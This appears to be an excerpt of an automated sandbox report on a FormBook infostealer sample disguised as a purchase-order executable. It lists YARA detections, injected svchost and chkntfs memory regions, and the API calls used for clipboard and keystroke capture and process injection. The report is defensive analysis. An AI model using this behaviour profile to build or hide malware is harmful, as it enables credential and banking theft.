            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F7EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00F7EAFF
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F6AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00F6AA57
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F99576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F99576

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4117493334.0000000000980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4120389612.0000000005750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1850432991.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4118583359.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4118512581.0000000003C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1850914338.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4117493334.0000000000980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4120389612.0000000005750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1850432991.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4118583359.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4118512581.0000000003C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1850914338.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: PO_987654345678.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: PO_987654345678.exe, 00000000.00000000.1646117746.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4680e68f-0
            Source: PO_987654345678.exe, 00000000.00000000.1646117746.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_17f4b972-1
            Source: PO_987654345678.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7fcc9e25-2
            Source: PO_987654345678.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7d4c811a-7
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: PO_987654345678.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C973 NtClose,1_2_0042C973
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72B60 NtClose,LdrInitializeThunk,1_2_02F72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_02F72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_02F72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F735C0 NtCreateMutant,LdrInitializeThunk,1_2_02F735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F74340 NtSetContextThread,1_2_02F74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F74650 NtSuspendThread,1_2_02F74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AF0 NtWriteFile,1_2_02F72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AD0 NtReadFile,1_2_02F72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AB0 NtWaitForSingleObject,1_2_02F72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BF0 NtAllocateVirtualMemory,1_2_02F72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BE0 NtQueryValueKey,1_2_02F72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BA0 NtEnumerateValueKey,1_2_02F72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72B80 NtQueryInformationFile,1_2_02F72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72EE0 NtQueueApcThread,1_2_02F72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72EA0 NtAdjustPrivilegesToken,1_2_02F72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72E80 NtReadVirtualMemory,1_2_02F72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72E30 NtWriteVirtualMemory,1_2_02F72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FE0 NtCreateFile,1_2_02F72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FB0 NtResumeThread,1_2_02F72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FA0 NtQuerySection,1_2_02F72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F90 NtProtectVirtualMemory,1_2_02F72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F60 NtCreateProcessEx,1_2_02F72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F30 NtCreateSection,1_2_02F72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CF0 NtOpenProcess,1_2_02F72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CC0 NtQueryVirtualMemory,1_2_02F72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CA0 NtQueryInformationToken,1_2_02F72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C60 NtCreateKey,1_2_02F72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C00 NtQueryInformationProcess,1_2_02F72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DD0 NtDelayExecution,1_2_02F72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DB0 NtEnumerateKey,1_2_02F72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D30 NtUnmapViewOfSection,1_2_02F72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D10 NtMapViewOfSection,1_2_02F72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D00 NtSetInformationFile,1_2_02F72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73090 NtSetValueKey,1_2_02F73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73010 NtOpenDirectoryObject,1_2_02F73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F739B0 NtGetContextThread,1_2_02F739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73D70 NtOpenThread,1_2_02F73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73D10 NtOpenProcessToken,1_2_02F73D10
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB4650 NtSuspendThread,LdrInitializeThunk,3_2_04BB4650
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB4340 NtSetContextThread,LdrInitializeThunk,3_2_04BB4340
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_04BB2CA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_04BB2C70
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2C60 NtCreateKey,LdrInitializeThunk,3_2_04BB2C60
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_04BB2DF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2DD0 NtDelayExecution,LdrInitializeThunk,3_2_04BB2DD0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_04BB2D30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_04BB2D10
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_04BB2E80
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2EE0 NtQueueApcThread,LdrInitializeThunk,3_2_04BB2EE0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2FB0 NtResumeThread,LdrInitializeThunk,3_2_04BB2FB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2FE0 NtCreateFile,LdrInitializeThunk,3_2_04BB2FE0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2F30 NtCreateSection,LdrInitializeThunk,3_2_04BB2F30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2AF0 NtWriteFile,LdrInitializeThunk,3_2_04BB2AF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2AD0 NtReadFile,LdrInitializeThunk,3_2_04BB2AD0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_04BB2BA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_04BB2BF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_04BB2BE0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2B60 NtClose,LdrInitializeThunk,3_2_04BB2B60
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB35C0 NtCreateMutant,LdrInitializeThunk,3_2_04BB35C0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB39B0 NtGetContextThread,LdrInitializeThunk,3_2_04BB39B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2CF0 NtOpenProcess,3_2_04BB2CF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2CC0 NtQueryVirtualMemory,3_2_04BB2CC0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2C00 NtQueryInformationProcess,3_2_04BB2C00
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2DB0 NtEnumerateKey,3_2_04BB2DB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2D00 NtSetInformationFile,3_2_04BB2D00
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2EA0 NtAdjustPrivilegesToken,3_2_04BB2EA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2E30 NtWriteVirtualMemory,3_2_04BB2E30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2FA0 NtQuerySection,3_2_04BB2FA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2F90 NtProtectVirtualMemory,3_2_04BB2F90
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2F60 NtCreateProcessEx,3_2_04BB2F60
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2AB0 NtWaitForSingleObject,3_2_04BB2AB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB2B80 NtQueryInformationFile,3_2_04BB2B80
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB3090 NtSetValueKey,3_2_04BB3090
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB3010 NtOpenDirectoryObject,3_2_04BB3010
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB3D10 NtOpenProcessToken,3_2_04BB3D10
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB3D70 NtOpenThread,3_2_04BB3D70
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_009A9270 NtCreateFile,3_2_009A9270
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_009A93E0 NtReadFile,3_2_009A93E0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_009A94D0 NtDeleteFile,3_2_009A94D0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_009A9570 NtClose,3_2_009A9570
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_009A96D0 NtAllocateVirtualMemory,3_2_009A96D0
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F6D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00F6D5EB
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F61201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00F61201
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F6E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00F6E8F6
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F720460_2_00F72046
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F682980_2_00F68298
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F3E4FF0_2_00F3E4FF
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F3676B0_2_00F3676B
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F948730_2_00F94873
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F0CAF00_2_00F0CAF0
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F2CAA00_2_00F2CAA0
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F1CC390_2_00F1CC39
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F36DD90_2_00F36DD9
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F091C00_2_00F091C0
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F1B1190_2_00F1B119
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F213940_2_00F21394
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F217060_2_00F21706
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F2781B0_2_00F2781B
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F219B00_2_00F219B0
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F1997D0_2_00F1997D
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F079200_2_00F07920
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F27A4A0_2_00F27A4A
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F27CA70_2_00F27CA7
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F21C770_2_00F21C77
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F39EEE0_2_00F39EEE
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F8BE440_2_00F8BE44
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F21F320_2_00F21F32
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00EB36300_2_00EB3630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004188D31_2_004188D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028201_2_00402820
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011601_2_00401160
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041010D1_2_0041010D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004101131_2_00410113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031901_2_00403190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416A6D1_2_00416A6D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416AAF1_2_00416AAF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416AB31_2_00416AB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004103331_2_00410333
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E3B11_2_0040E3B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E3B31_2_0040E3B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402C441_2_00402C44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402C501_2_00402C50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004024A01_2_004024A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042EFD31_2_0042EFD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC02C01_2_02FC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE02741_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030003E61_2_030003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F01_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA3521_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030001AA1_2_030001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD20001_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF81CC1_2_02FF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF41A21_2_02FF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC81581_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA1181_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F301001_2_02F30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5C6E01_2_02F5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3C7C01_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F407701_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F647501_2_02F64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEE4F61_2_02FEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030005911_2_03000591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF24461_2_02FF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE44201_2_02FE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F405351_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA801_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF6BD71_2_02FF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFAB401_2_02FFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E8F01_2_02F6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F268B81_2_02F268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A9A61_2_0300A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4A8401_2_02F4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F428401_2_02F42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A01_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F569621_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEEDB1_2_02FFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52E901_2_02F52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFCE931_2_02FFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40E591_2_02F40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEE261_2_02FFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32FC81_2_02F32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBEFA01_2_02FBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4F401_2_02FB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60F301_2_02F60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE2F301_2_02FE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F82F281_2_02F82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30CF21_2_02F30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0CB51_2_02FE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40C001_2_02F40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3ADE01_2_02F3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F58DBF1_2_02F58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDCD1F1_2_02FDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4AD001_2_02F4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5D2F01_2_02F5D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE12ED1_2_02FE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5B2C01_2_02F5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F452A01_2_02F452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F8739A1_2_02F8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2D34C1_2_02F2D34C
